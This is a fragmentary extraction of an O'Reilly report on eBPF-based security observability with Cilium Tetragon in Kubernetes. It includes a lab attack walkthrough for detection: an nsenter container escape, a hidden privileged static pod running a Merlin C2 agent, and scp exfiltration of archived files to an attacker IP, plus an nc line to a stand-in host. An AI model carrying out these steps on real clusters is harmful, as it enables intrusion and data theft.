Security Observability with eBPF
Measuring Cloud Native Security Through eBPF Observability

REPORT
Compliments of Isovalent
The O’Reilly logo is a registered trademark of O’Reilly Media, Inc. Security Observability with eBPF, the cover image, and related trade dress are trademarks of O’Reilly Media, Inc.

The views expressed in this work are those of the authors and do not represent the publisher’s views. While the publisher and the authors have used good faith efforts to ensure that the information and instructions contained in this work are accurate, the publisher and the authors disclaim all responsibility for errors or omissions, including without limitation responsibility for damages resulting from the use of or reliance on this work. Use of the information and instructions contained in this work is at your own risk. If any code samples or other technology this work contains or describes is subject to open source licenses or the intellectual property rights of others, it is your responsibility to ensure that your use thereof complies with such licenses and/or rights.

This work is part of a collaboration between O’Reilly and Isovalent. See our statement of editorial independence.

978-1-098-13318-4
Table of Contents

3. Security Observability
   The Four Golden Signals of Security Observability
   Process Execution
   Network Sockets
   File Access
   Layer 7 Network Identity
   Real-World Attack

4. Security Prevention
   Prevention by Way of Least-Privilege
   CTFs, Red Teams, Pentesting, Oh My!

Conclusion
CHAPTER 1
The Lack of Visibility

1 SLOs are covered in more detail in Site Reliability Engineering by Betsy Beyer et al. (O’Reilly), which is free to read.
2 Beyer et al., Site Reliability Engineering.
• Have any workloads in my environment made a connection to “known-bad.actorz.com”?
• Show me all local privilege escalation techniques detected in the last 30 days.
• Have any workloads other than Fluentd used S3 credentials?
3 The wonderful CNCF Technical Security Group has been working on secure defaults guidelines for CNCF projects.
4 Andrew Martin and Michael Hausenblas, Hacking Kubernetes (O’Reilly).
High-Fidelity Observability
When investigating a threat, the closer to the event the data is, the higher fidelity the data provides. A compromised pod that escalates its privileges and laterally moves through the network won’t show up in our Kubernetes audit logs. If the pods are on the same host, the lateral movement won’t even show up in our network logs. If our greatest attack surface is pods, we’ll want our security observability as close to pods as possible. The “further out” we place our observability, the less critical security context we’re afforded. For example, firewall or network intrusion detection logs from the network generally map only to the source IP address of the node that the offending pod resides on, because packet encapsulation renders the identity of the source meaningless.

The same lateral movement event can be measured at the virtual ethernet (veth) interface of the pod or the physical network interface of the node. Measuring from the network includes the pre-NAT pod IP address and, with the help of eBPF, we can retrieve Kubernetes labels, namespaces, pod names, and more. We are improving our event fidelity.
But if we wanted to get even closer to pods, eBPF operates in-kernel where process requests are captured. We can assert a more meaningful identity of lateral movement than a network packet at the socket layer (shown in Figure 1-1), which includes the process that invoked the connection, any arguments, and the capabilities it’s running with. Or we can collect process events that never create a packet at all.
A Kubernetes Attack
Let’s consider a hypothetical attack scenario in Kubernetes. (You don’t need to understand details of this attack now, but by the end of this report you’ll understand common attack patterns and how you can take advantage of simple tools to detect sophisticated attacks.) Imagine you run a multitenant Kubernetes cluster that hosts both public-facing and internal applications. One of your tenants runs an internet-facing application with an insecure version of Apache Log4j.5
What Is eBPF?
eBPF is an emerging technology that enables event-driven custom code to run natively in an operating system kernel. This has spawned a new era of network, observability, and security platforms. eBPF extends kernel functionality without requiring changes to applications or the kernel in order to observe and enforce runtime security policy. eBPF’s origins began with BPF, a kernel technology originally developed to aid packet filtering, as in the inimitable tcpdump packet-capture utility.

The “enhanced” version of BPF (eBPF) came from an initial patch set of five thousand lines of code, followed by a group of features that slowly trickled into the Linux kernel, providing capabilities for tracing low-level kernel subsystems and drawing inspiration from the superlative DTrace utility. While eBPF is a Linux (and soon, Windows) utility, the omnipresent Kubernetes distributed system has been uniquely positioned to drive the development of eBPF as a container technology.

5 The Log4j vulnerability is due to Log4j parsing logs and attempting to resolve the data and variables in its input. The JNDI lookup allows variables to be fetched and resolved over a network, including to arbitrary entities on the internet. More details are in the CVE.
6 Suspicious domains can include a domain generation algorithm.
eBPF’s unique vantage point in the kernel gives Kubernetes teams the power of security observability by understanding all process events, system calls, and networking operations in a Kubernetes cluster. eBPF’s flexibility also enables runtime security enforcement for process events, system calls, and networking operations for all pods, containers, and processes, allowing us to write customizable logic to instrument the kernel on any kernel event.

We will walk you through in detail what eBPF is, how you can use eBPF programs, and why they are vital in cloud native security (Chapter 2). But first we need to understand the basic container technology concepts.
Kernel Namespaces
A process in Linux is an executable program (such as /bin/grep) run in memory by the kernel. A process gets a process ID or PID (which can be seen when you run ps xao pid,comm), its own memory address space (seen when you run pmap -d $PID), and file descriptors, used to open, read, and write to files (lsof -p $PID). Processes run as users with their permissions, either root (UID 0) or nonroot.

Containers use Linux namespaces to isolate these resources, creating the illusion that a container is the only container accessing resources on a system. Namespaces create an isolated view for various resources (a quick shell illustration follows this list):
PID namespace
This namespace masks process IDs so the container only sees the processes running inside the container and not processes running in other containers or on the Kubernetes node.

Mount namespace
This namespace unpacks the tarball of a container image (called a base image) on the node and chroots the directory for the container.8

Network namespace
This namespace configures network interfaces and routing tables for containers to send and receive traffic. In Kubernetes, this namespace can be disabled with hostNetwork, which places the pod directly in the host’s network namespace.
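To make namespace isolation concrete, here is a quick way to inspect a process’s namespaces from a shell (an illustrative sketch of ours, not from the report; it uses only standard /proc entries on a Linux host):

ls -l /proc/$$/ns                          # one symlink per namespace of the current shell
readlink /proc/1/ns/net /proc/$$/ns/net    # identical targets mean a shared network namespace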
7 runC is currently the most widely used low-level container runtime. It’s responsible for “spawning and running containers on Linux according to the OCI specification.”
8 Container runtimes can block the CAP_SYS_CHROOT capability by default, and pivot_root is used due to security issues with accessible mounts.
Cgroups
Cgroups can limit the node’s CPU and memory resources a container can consume. From a security perspective, this prevents a “noisy neighbor” or DoS (denial of service) attack where one container consumes all hardware resources on a node. Containers that exceed their CPU limit will be rate limited by cgroups, whereas exceeding memory limits will cause an out-of-memory kill (OOM kill) event.
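For illustration (a sketch of ours, assuming a cgroup v2 host; cgroup v1 uses different file names), these limits are visible as ordinary files in the cgroup filesystem:

cat /proc/$$/cgroup                                            # which cgroup the current process belongs to
cat /sys/fs/cgroup/$(cut -d: -f3 /proc/$$/cgroup)/memory.max   # memory limit; "max" means unlimited
cat /sys/fs/cgroup/$(cut -d: -f3 /proc/$$/cgroup)/cpu.max      # CPU quota and period in microseconds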
9 Network policy allows you to specify the allowed connections a pod can make. It’s basically a firewall for containers. Several CNIs such as Cilium provide custom resource definitions (CRDs) for network policy to extend functionality to provide a layer 7 firewall, cluster-wide policies, and more.
10 There is an alpha (as of Kubernetes 1.22) project to run Kubernetes Node components in the user namespace.
Linux Capabilities
In the old world, processes were either run as root (UID 0) or as a standard user (!= UID 0). This system was binary; either a process was root and could do (almost) anything, or it was a normal user and was restrained to its own resources. Sometimes unprivileged processes need privileged capabilities, such as ping sending raw packets, without being granted root permissions. To solve this, the kernel introduced capabilities, which grant unprivileged processes more granular security privileges, such as CAP_NET_RAW, which enables ping to send raw packets.

Capabilities can be applied to a file or a process. To observe the capabilities that a running process has, we can inspect the kernel’s virtual filesystem, /proc:
grep -E 'Cap|Priv' /proc/$(pgrep ping)/status
CapInh: 0000003fffffffff
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
NoNewPrivs: 0
We can then use the capsh binary to decode the values into human-readable capabilities:
capsh --decode=0000003fffffffff
0x0000003fffffffff=cap_chown,cap_dac_override...
cap_net_raw...
cap_sys_admin...
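File capabilities can be inspected in a similar way (an illustration of ours, not from the report; getcap ships with libcap, and ping’s path and capability set vary by distribution):

getcap /usr/bin/ping
# typical output on distributions using file capabilities instead of setuid:
# /usr/bin/ping cap_net_raw=ep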
Precloud Security
Before cloud native became the dominant production environment, network monitoring and threat detection tools were based on auditd, syslog, dead-disk forensics, whatever your network infrastructure happened to log, and optionally, copying the full contents of network packets to disk (known as packet captures).11

Capturing packets stores every packet in a network to disk and runs custom pattern matching on each packet to identify an attack. Most modern application traffic is encrypted, largely thanks to Let’s Encrypt and service mesh, and high-scale environments are now the norm, so packet captures have become too costly and ineffective for cloud native environments. Another tool used to monitor for security incidents is disk forensics.

11 This is required reading for anyone responsible for securing a cloud native environment.
Disk forensics collects a bit-for-bit duplication of a volume or disk during incident investigation with the goal of useful artifact extraction. Forensics artifacts are “the things left behind unintentionally, unconsciously, often invisibly, that help us get to the bottom of an incident.”1 While a lot of useful information can reside on-disk, the artifacts can be fairly random, and you don’t get the luxury of defining what data you would like to collect. Thus, you’re left with a literal snapshot of artifacts that exist at the time of capture. Artifacts in memory are lost altogether unless they’re paged to disk.

Memory forensics started by focusing on a new class of in-memory attacks; however, most operating systems now deploy kernel address space layout randomization (KASLR),2 which complicates introspection of kernel memory and thus gives you only a partial solution.
Contrast this with eBPF, a native kernel technology that allows you to trace or execute mini programs on virtually any type of kernel event.3 This enables capturing security observability events with a native understanding of container attributes like namespaces, capabilities, and cgroups. Fully customizable programs that run at kernel events, like a process being created, allow us to have a flexible and powerful runtime security framework for containers.

1 See the discussion of forensic artifacts by Tetra Defense’s President, Cindy Murphy.
2 Kernel address space layout randomization (KASLR) is a well-known technique to make exploits harder by placing various objects in the stack at random, rather than fixed, addresses.
3 As named by Brendan Gregg, an eBPF legend.
This means eBPF allows you to intercept any kernel event, run customized code on the return value, and react with fully programmable logic. You can think of it as a virtual machine in the kernel with a generic set of 64-bit registers and eBPF programs that are attached to kernel code paths.
eBPF Programs
The eBPF verifier and JIT (just-in-time) compiler are components that ensure that eBPF programs fulfill the following programmability requirements:

Safety from bugs
Before executing the eBPF bytecode (the compiled version of the eBPF program), the kernel takes it and passes it through the eBPF verifier. The eBPF verifier makes sure that the loaded program cannot access or expose arbitrary kernel memory to userspace by rejecting out-of-bound accesses and dangerous pointer arithmetic. It also ensures that the loaded program will always terminate, to avoid creating an infinite loop in the kernel. If verification fails, the eBPF program is rejected.

5 This blog post is a great source to learn and understand the different hook points, data sources, and their advantages.
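As a quick aside (an illustration of ours, not from the report; bpftool ships with the kernel’s tooling packages and typically needs root), you can list the programs that the verifier has accepted and that are currently loaded:

sudo bpftool prog show   # one line per loaded eBPF program: id, type, name, attach info
sudo bpftool map show    # the eBPF maps those programs use to share state with userspace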
Starting from the top of the image, you can attach an eBPF program to userspace applications by hooking on uprobes. This means you can run an eBPF program for particular functions in your applications. This is how you can profile applications using eBPF.

Then, you can attach eBPF programs to arbitrary system calls and kernel functions with kprobes. “Kprobes can create instrumentation events for any kernel function, and it can instrument instructions within functions. It can do this live, in production environments, without needing to either reboot the system or run the kernel in any special mode.”6 Kprobe-observable events include reads and writes to a file, mounting a sensitive filesystem to a container, changing a kernel namespace (which can indicate a privilege escalation), loading a kernel module, creating a socket, executing a program, and more.

You can also attach to an arbitrary trace point in the Linux kernel. A trace point is a well-known, defined function name of the Linux kernel that will stay stable over time. While kernel functions might change per release, trace points provide a stable API, allowing you to instrument the entire Linux kernel.
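As a concrete taste of these hook points (a sketch of ours, not from the report; it assumes the bpftrace front end for eBPF is installed and run as root), one-liners can attach small programs to a kprobe and to a tracepoint:

# kprobe: fires inside the kernel's do_unlinkat function, i.e., on file deletion
bpftrace -e 'kprobe:do_unlinkat { printf("%s (pid %d) is unlinking a file\n", comm, pid); }'

# tracepoint: a stable hook that fires on every execve(), i.e., process execution
bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf("%s -> %s\n", comm, str(args->filename)); }'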
Why eBPF?
eBPF collects and filters security observability data directly in the kernel, from memory or disk, and exports it to userspace as security observability events, where the data can be sent to a SIEM for advanced analysis. Because the kernel is shared across all containers,7 these events provide a historical record of the entire environment, from containers to the node processes that make up a Kubernetes cluster.

Security observability data includes Kubernetes identity-aware information, such as labels, namespaces, pod names, container images, and more. eBPF programs can be used to translate and map processes, their system calls, and network functions into a Kubernetes workload and identity.
eBPF programs are able to both observe Kubernetes workloads and enforce user-defined security policies. With access to all data that the kernel is aware of, you can monitor arbitrary kernel events such as system calls, network sockets, file descriptors, Unix domain socket connections, etc. Security policies defined at runtime observe and enforce desired behaviors by using a combination of kernel events. They can be fine-grained and applied to specific workloads by using policy selectors. If the appropriate policy selectors match, the pod can be terminated or paused for later investigation.

To benefit from eBPF-based observability and enforcement, end users are not expected to write eBPF programs by themselves. There are already existing projects and vendors creating open source security observability tools that use eBPF programs to provide this observation and even enforcement, such as Tracee and Falco. We will dive deeper into one of them, Cilium Tetragon, and detect a real-world attack scenario in Chapter 3.

7 With notable exceptions, such as userspace emulated kernels like gVisor, unikernels, and other sandboxed environments.
8 The madvise() system call advises the kernel about how to handle paging input/output in a specific address range. In the case of MADV_DONTNEED, the application is finished with the given range, so the kernel can free resources associated with it. The detailed description of the Dirty COW Linux privilege escalation vulnerability can be found in the corresponding CVE.
Network Visibility
Sockets are the operating system representation of communication between applications on the same node,10 between pods and clusters, or on the internet. There are many types of sockets in Linux (IPC, Unix domain, TCP/IP, etc.), but we’re specifically interested in TCP/IP sockets for security observability.

Sockets provide improved identity over network packets because socket events are tracked in the operating system kernel and coupled with process and Kubernetes metadata. This allows you to track all network behavior and associate that behavior with the specific workload and service owner. This identity helps remediate, patch, or lock down a certain pod with network policy if malicious activity is detected.
eBPF can trace the full lifecycle of a socket and corresponding connections for every container in your cluster. This includes visibility for a process listening for a connection, when a socket accepts an inbound connection from a client, how much data was transferred in and out of a connection, and when the socket is closed.
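To see why continuous socket-level identity matters, compare it with point-in-time tooling (an illustrative aside of ours; ss is part of iproute2, and -p needs root to show other users’ processes). eBPF records the same socket-to-process association as a stream of events rather than a snapshot:

ss -tlpn   # listening TCP sockets with the owning process, right now
ss -tn     # established TCP connections; once closed, no history remains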
9 The pivot_root system call allows you to remount the root filesystem to a nonroot location, while simultaneously mounting something back on the root. It’s typically used during system startup when the system mounts a temporary root filesystem (e.g., an initrd) before mounting the real root filesystem, but it can be used by attackers mounting a sensitive filesystem inside a container.
10 As Michael Kerrisk calls it in The Linux Programming Interface (No Starch Press).
Tracking all network connections at the socket layer gives a cluster-wide view into all network connections in your cluster and includes the pod and process involved. There are numerous good reasons to collect network observability data, including to build out a least-privilege network policy. If you’re planning on using network policies, you’ll need network observability to help craft your policy.

By using network observability, you can also detect several techniques in the MITRE ATT&CK® framework,11 which is a well-known knowledge base and model for adversary behavior. For example, you can identify lateral movement, which is when an attacker “explor[es] the network to find their target and subsequently gain[s] access to it. Reaching their objective often involves pivoting through multiple systems and accounts.”12
Filesystem Visibility
Unauthorized host filesystem access in containers has caused several severe vulnerabilities and privilege escalation techniques. The official Kubernetes documentation calls this out: “There are many ways a container with unrestricted access to the host filesystem can escalate privileges, including reading data from other containers, and abusing the credentials of system services, such as kubelet.”13

While it’s recommended to use a read-only filesystem for pods, observability into filesystem mounts inside a container or Kubernetes pod is crucial. We can observe all mount system calls from a container, which provide visibility for all mounts made on a node.

Observing read and write events to a filesystem or to stdin/stdout/stderr file descriptors is a powerful method to detect attacker behavior, including achieving persistence on a compromised system. Monitoring and enforcing access to sensitive files and credentials is a good way to get started. For example, by observing write access to the /root/.ssh/authorized_keys file, you can identify if an attacker installs a potential backdoor to maintain a foothold on the system.
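For a sense of what watching such a file looks like with traditional tooling (a sketch of ours, assuming inotify-tools is installed), inotify can report the writes, though unlike eBPF it carries no process context or Kubernetes identity:

inotifywait -m -e modify,attrib,close_write /root/.ssh/authorized_keys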
Real-World Detection
But how do you translate system calls and socket connections into detecting a real-world attack? If you run strace on your machine, you can see that system calls are happening all the time.16

14 An example attack framework can be MITRE. A few steps from the attack are covered in “Detecting a Container Escape with Cilium and eBPF” by Natalia Reka Ivanko.
15 With some notable exceptions, such as gVisor, which implements a proxy kernel in userspace, or Firecracker, which provides a sandboxed and limited KVM guest per workload.
16 Strace is a useful diagnostic, instructional, and debugging tool which can help you, for example, to observe system calls.
17 There are multiple books and online courses on how to define a threat model. One online course is “Kubernetes Threat Modeling” (O’Reilly).
Figure 3-1. eBPF collection points for a process, correlated by the exec_id value

With the help of the open source eBPF-based tool Cilium Tetragon, each of the security observability signals can be observed and exported to userspace as JSON events.

Cilium Tetragon is an open source security observability and runtime enforcement tool from the makers of Cilium.3 It captures different process and network event types through a user-supplied configuration to enable security observability on arbitrary hook points in the kernel. These different event types correspond to each of the golden signals. For example, to detect process execution, Cilium Tetragon detects when a process starts and stops. To detect network sockets, it detects whenever a process opens, closes, accepts, or listens on a network socket. File access is observed by monitoring system calls and file descriptors through kprobe hook points.

3 Cilium Tetragon is an open source eBPF-based runtime security and visibility tool, free to download. Cilium is open source software for providing, securing, and observing network connectivity between container workloads—cloud native, and fueled by the revolutionary kernel technology eBPF.
Process Execution
This first signal is process execution, which can be observed with the Cilium Tetragon process_exec and process_exit JSON events. These events contain the full lifecycle of processes, from fork/exec to exit,4 including deep metadata such as:

Binary name
Defines the name of an executable file

Binary hash
A more specific form of attribution5 than binary name

Command-line arguments
Define the program’s runtime behavior

Process ancestry
Helps to identify process execution anomalies (e.g., if a nodejs app forks a shell, this is suspicious)

Current working directory
Helps to identify hidden malware execution from a temporary folder, which is a common pattern used in malware

Linux capabilities
Includes the effective, permitted, and inheritable sets,6 which are crucial for compliance checks and detecting privilege escalation

4 In Linux, fork creates a new child process, which is a replica of its parent. Then execve replaces the replica process with another program. Processes terminate by calling the exit system call after receiving a signal or fatal exception.
5 Attribution refers to using artifacts from an attack to identify an actor or adversary. An understanding of an adversary through attribution can provide vital defenses against their known tactics, techniques, and procedures (TTPs).
6 Capability sets define what permissions a capability provides.
Kubernetes metadata
Contains pods, labels, and Kubernetes namespaces, which are critical to identify service owners, particularly in a multitenant environment

exec_id
A unique process identifier that correlates all recorded activity of a process

While the process_exec event shows how and when a process was started, the process_exit event indicates how and when a process dies, providing a full lifecycle of all processes. The process_exit event includes similar metadata to the process_exec event and shares the same exec_id corresponding to the specific process.
The following snippet highlights part of a process_exec event capturing a curl against www.google.com from the elasticsearch pod:

"process_exec":{
  "process":{
    "binary":"/usr/bin/curl",
    "arguments":"www.google.com",
    "pod":{
      "namespace":"tenant-jobs",
      "name":"elasticsearch-56f8fc6988-pb8c7",
Network Sockets
The second signal is network sockets, which can be observed with the Cilium Tetragon process_connect, process_close, and process_listen JSON events. The process_connect event records a process network connection to an endpoint, either locally, to another pod, or to an endpoint on the internet. The process_close event records a socket closing and includes sent and received byte statistics for the socket. The process_listen event records a process listening for connections on a socket. Capturing network sockets with these events provides:
File Access
The third signal is file access, which can be observed with the Cilium Tetragon process_kprobe JSON events. By using kprobe hook points, these events are able to observe arbitrary system calls and file descriptors in the Linux kernel, giving you the ability to monitor every file a process opens, reads, writes, and closes throughout its lifecycle. For example, you can trace Unix domain sockets as files, which is particularly useful to monitor for an exposed Docker socket, and to detect filesystem mounts or sensitive file access.

The following snippet highlights the most important parts of a process_kprobe event, which observes the write system call on the /etc/passwd file:
"process_kprobe":{
"process":{
"binary":"/usr/bin/vi",
"arguments":"/etc/passwd",
"pod":{
"namespace":"tenant-jobs",
"name":"elasticsearch-56f8fc6988-sh8rm",
In addition to the Kubernetes identity and process metadata, the process_kprobe events contain the arguments of the observed system call. In this case, they are:

path
The observed file’s path

bytes_arg
Content of the observed file, encoded in base64

size_arg
Size of the observed file in bytes
These arguments can be observed in the following snippet under the function_name field:

"function_name":"write",
"args":[
  "file_arg":{
    "path":"etc/passwd"
  },
  "bytes_arg":"ZGFlbW9uOng6MjoyOmRhZW1vbjovc2Jpbjovc2Jpbi",
  "size_arg":"627"
]
"process_close":{
"process":{
"exec_id":"bWluaWt1YmU6MzM0OTc2NzgxOTUzNTozODMxNA==",
"binary":"/usr/bin/nc",
"arguments":"raiz3gjkgtfhkkc.not-reverse-shell.com 443"
Real-World Attack
Now that we’ve described the basics of security observability, let’s observe a real-world attack and detect events with eBPF security observability along the way. Detecting attacks that you conduct yourself serves two essential purposes:

9 The different event types that can be detected via Cilium Tetragon can be found on GitHub.
10 Tactics, techniques, and procedures (TTPs) define the behaviors, methods, and tools used by threat actors during an attack.
11 Privileged pods have direct access to all of the node’s resources and disable all kernel sandboxing.
host namespaces with the nsenter command, which is shown in Figure 3-3.

From there, we’ll write a static pod manifest in the /etc/kubernetes/manifests directory that will cause the kubelet to manage our pod directly.12 We take advantage of a Kubernetes bug where we define a Kubernetes namespace that doesn’t exist for our static pod, making our stealthy pod invisible to kubectl and the Kubernetes API server.

Our stealthy static pod runs a Merlin command and control (C2) agent. “Merlin is a cross-platform, post-exploitation command and control server and agent written in Go.”13 “A command and control [C&C] server is a computer controlled by an attacker which is used to send commands to systems compromised by malware and receive stolen data from a target network.”14 Our Merlin agent will reach out to our C2 server infrastructure running at http://main.linux-libs.org. The attack steps through this point are shown in Figure 3-4:

12 A static pod is locally managed by the kubelet and not the Kubernetes API server.
13 This is from the official Merlin documentation.
14 Trend Micro has an introduction to command and control systems.
Second, let’s start minikube and mount the BPF filesystem on the minikube node:15

minikube start --network-plugin=cni --cni=false --memory=4096 \
  --driver=virtualbox \
  --iso-url=https://github.com/kubernetes/minikube/releases/download/v1.15.0/minikube-v1.15.0.iso
Now let’s install open source Cilium Tetragon:
helm install -n kube-system cilium-tetragon cilium/tetragon
Wait until the cilium-tetragon pod shows as running:
kubectl get ds -n kube-system cilium-tetragon
NAME READY STATUS RESTARTS AGE
cilium-tetragon-pbs8g 2/2 Running 0 50m
Now let’s observe the golden signal security observability events (process_exec, process_exit, process_connect, process_close, and process_listen) by running:

kubectl exec -n kube-system ds/cilium-tetragon -- tail \
  -f /var/run/cilium/tetragon.log

Now that we’re capturing security observability events as JSON files,16 let’s prepare for our attack!
18 The goal of Linux capabilities, in theory, is to eliminate the overly permissive privileges granted to users and applications by providing a more granular set of permissions. However, as Michael Kerrisk wrote in 2012, “the powers granted by CAP_SYS_ADMIN are so numerous and wide-ranging that, armed with that capability, there are several avenues of attack by which a rogue process could gain all of the other capabilities.”
If you look further, you can also inspect the /docker-entrypoint.sh binary as an entry point from the /usr/bin/containerd-shim parent, which starts an nginx daemon. The corresponding TCP socket is represented by a process_listen event, where you can see that /usr/sbin/nginx listens on port 80:

"process_listen":{
  "process":{
    "binary":"/usr/sbin/nginx",
    "ip":"0.0.0.0",
    "port":80,
    "protocol":"TCP"

In our kubectl shell, let’s use nsenter to enter the host’s mount, UTS, network, IPC, and PID namespaces (targeting PID 1) and run bash as root on the host:

root@minikube:/# nsenter -t 1 -m -u -n -i -p bash
bash-5.0#
Persistence
There are many ways you can achieve persistence.19 In this example, we’ll use a hidden static Kubernetes pod. When you write a pod spec in the /etc/kubernetes/manifests directory on a kubeadm-bootstrapped cluster like minikube,20 the kubelet will automatically launch and locally manage the pod. Normally, a “mirror pod” is created by the API server, but in this case, we’ll specify a Kubernetes namespace that doesn’t exist, so the “mirror pod” is never created and kubectl won’t know about it. Because we have unfettered access to node resources, let’s cd into the /etc/kubernetes/manifests directory and drop a custom hidden pod spec:
cd /etc/kubernetes/manifests
cat << EOF > merlin-agent-silent.yaml
apiVersion: v1
kind: Pod
metadata:
  name: merlin-agent
  namespace: doesnt-exist
spec:
  containers:
  - name: merlin-agent
    image: merlin-agent-h2:latest
    securityContext:
      privileged: true
EOF
Now that we’ve written our hidden PodSpec to kubelet’s directory, we can verify that the pod is invisible to the Kubernetes API server by running kubectl get pods --all-namespaces; however, it can still be identified by Cilium Tetragon. By monitoring security observability events from Cilium Tetragon, you can detect persistence early in the MITRE framework by catching the merlin-agent-silent.yaml file write with /usr/bin/cat in the following process_exec event:

"process_exec":{
  "process":{
    "cwd":"/etc/kubernetes/manifests/",
    "binary":"/usr/bin/cat",
After compromising the cluster and achieving persistence with a container escape and an invisible container, what can you do next? There are several post-exploitation techniques: you can gain further access to the target’s internal networks, gather credentials, create a C2 infrastructure, or exfiltrate data from the environment. In this report, we’ll create a command and control infrastructure and perform data exfiltration on the environment by locating sensitive PDF files and sending them over via an SSH tunnel with the C2 agent. The detailed attack steps are shown in Figure 3-3 and will be covered in the next section.

C2 agent
As a post-exploitation step, we created a C2 agent for persistence with a custom Docker image that establishes a persistent connection with the C2 server. In Figure 3-5, we cover each step of the post-exploitation behavior in the attack.
21 Having the credentials in the arguments is beneficial for detecting the attack, but if you’re concerned about leaking secrets in process arguments, these can be removed via Cilium Tetragon configuration in the future.
In this case, the agent is using HTTP/2 to communicate with the server using the exchanged SecurePSK!23@456 key. We can use the exec_id to correlate all events from the process, including the corresponding TCP socket in a process_connect event. By inspecting the destination IP address 34.116.205.187 and port 443, we’ve located the C2 server:

"process_connect":{
  "process":{
    "exec_id":"bWluaWt1YmU6MjA4MjU3MzM4MjgwMToyNTc0NA==",
    "cwd":"/opt/merlin-agent/",
    "binary":"/tmp/go-build3518135900/b001/exe/main",
    "destination_ip":"34.116.205.187",
    "destination_port":443,
    "protocol":"TCP"
Using the same exec_id, we can identify all the activity of the agent, including the agent reaching out regularly to the server and executing any commands supplied by the attacker. This is represented by two events: a process_connect and the corresponding process_close:

"process_close":{
  "process":{
    "exec_id":"bWluaWt1YmU6MjA4MjU3MzM4MjgwMToyNTc0NA==",
    "cwd":"/opt/merlin-agent/",
    "binary":"/tmp/go-build3518135900/b001/exe/main",
    "arguments":"-v -url https://main.linux-libs.org:443 -proto h2 -psk SecurePSK!23@456",
    "destination_ip":"34.116.205.187",
    "destination_port":443,
    "stats":{
      "bytes_sent":"4364",
      "bytes_received":"8874",
Exfiltrating data
Following the MITRE ATT&CK framework, we’ve detected events covering initial access, execution, persistence, privilege escalation, defense evasion, and command and control. Now we can focus on post-exploitation techniques such as harvesting credentials or stealing sensitive data from other potential victims.

From the main C2 server, you can gather sensitive files by using the find or the locate commands, then compress them with 7zip.22 In the second process_exec event, you can see the 7zip child process:

"process_exec":{
  "process":{
    "binary":"/usr/bin/7z",
    "arguments":"-c \"7z a s3nsitiv3.7z ../ops_bank_accounts/\"",

By looking for the same exec_id, you can identify the two corresponding process_exit events (1, 2), which show that both the /bin/sh and the 7zip processes are terminated, and thus the compression has finished.
The final step is to upload s3nsitiv3.7z to the server. You can use scp to copy the file over an SSH tunnel, or alternatively there is a built-in upload command in Merlin.23 Choosing the first option, we transferred the file via scp -i /root/.ssh/id_rsa s3nsitiv3.7z attacker@34.116.205.187:~. The file transfer is represented by three process_exec events. The first event in the chain represents the SSH tunnel that was opened by the /usr/bin/ssh binary:

"process_exec":{
  "process":{
    "binary":"/usr/bin/ssh",
    "arguments":"-i /root/.ssh/id_rsa -l attacker@34.116.205.187 \"scp -t ~\"",

The second event, its child process, shows the /bin/sh execution, while the last event in the chain represents the actual scp command:
23 Merlin is a post-exploit command and control (C2) tool, also known as a Remote Access Tool (RAT), that communicates using the HTTP/1.1, HTTP/2, and HTTP/3 protocols.
"process_exec":{
"process":{
"cwd":"/opt/merlin-agent/",
"binary":"/bin/sh",
"arguments":"-c \"scp -i ~/.ssh/id_rsa s3nsitiv3.7z
attacker@34.116.205.187:~\"",
"process_exec":{
"process":{
"binary":"/usr/bin/scp",
"arguments":"-i /root/.ssh/id_rsa s3nsitiv3.7z
attacker@34.116.205.187:~",
1 The setuid system call sets the effective user ID of a process. The effective user ID is used by the operating system to determine privileges for an action.
Security observability can also highlight misconfigurations or overly permissive privileges in your workloads. This gives security teams the data they need to objectively measure their security state, in real time and historically. Security could adopt a lot from SRE: observability, blameless post-mortems, error budgets, security testing, security level objectives, and more. It’s all rooted in collecting and measuring our observability data.
2 In a 2016 blog post, Jessie Frazelle describes how to create your own custom seccomp profile by capturing all the system calls your workload requires, and describes how the default Docker seccomp profile was created based on such an allowlist policy.
3 Misconfiguration accounted for 59% of detected security incidents related to Kubernetes, according to Red Hat’s State of Kubernetes Security Report.
4 Red team is a term that describes various penetration testing, including authorized attacks on infrastructure and code, with the intent of improving the security of an environment by highlighting weak points in its defenses.
5 This assumes you trust your build and supply chain security. The state-of-the-art defense for supply chain security in cloud native is Sigstore, which has automated digitally signing and checking components of your build process. According to AWS CloudFormation, “Drift detection enables you to detect whether a stack’s actual configuration differs, or has drifted, from its expected configuration.”
Tracing Policy
Whether you’re building out an allowlist or a denylist, you can use Cilium Tetragon to get an enforcement framework called tracing policy. Tracing policy is a user-configurable Kubernetes custom resource that lets you observe and enforce on arbitrary hook points in the kernel; a minimal sketch follows the notes below.

6 Our GitHub repo contains all the events and prevention policies discussed in this book.
7 Gitops refers to the patterns in cloud native environments where changes to infrastructure are made to a version control system, and CI/CD pipelines test and apply changes automatically. In short, operations teams adopt development team patterns.
8 Seccomp acts on user-configurable profiles, which are configuration files that specify the system calls and arguments a container is allowed or disallowed to invoke.
9 Pod readiness gates are part of the pod lifecycle events and indicate that a pod is healthy and ready to receive traffic.
10 Additional prevention mechanisms such as the kernel’s cgroup freezer mechanism are supported, which stop a container but leave its state (stack, file descriptors, etc.) in place for forensic extraction.
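The following is a minimal sketch of such a policy, modeled on the Tetragon project’s published examples (the exact CRD schema is defined by the project and may have changed since this writing; the fd_install hook, file match, and Sigkill action here are illustrative):

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: deny-tmp-tetragon-access
spec:
  kprobes:
  - call: "fd_install"          # kernel function invoked when a process opens a file
    syscall: false
    args:
    - index: 0
      type: "int"
    - index: 1
      type: "file"
    selectors:
    - matchArgs:
      - index: 1
        operator: "Equal"
        values:
        - "/tmp/tetragon"       # only fire for this file
      matchActions:
      - action: Sigkill         # enforcement: kill the offending process

Applied with kubectl apply -f, a policy like this observes every matching call but enforces only when its selectors match, mirroring the observe-then-enforce workflow described above.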
Stage 1: Exploitation
The first stage of the attack we carried out in Chapter 3 takes advantage of an overly permissive pod configuration to exploit the system with a hidden command and control (C2) pod. We launched a privileged pod that grants,11 among other things, the CAP_SYS_ADMIN Linux capability. This configuration can facilitate direct access to host resources from a pod, often giving a pod the same permissions as root on the node:

kind: Pod
…
  name: merlin-agent
  namespace: doesnt-exist
  hostNetwork: true
…
  securityContext:
    privileged: true
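For contrast, a least-privilege configuration for the same container would drop capabilities rather than grant them (an illustrative sketch of ours, not the report’s policy):

securityContext:
  privileged: false
  allowPrivilegeEscalation: false   # blocks setuid-style privilege gains
  runAsNonRoot: true
  capabilities:
    drop:
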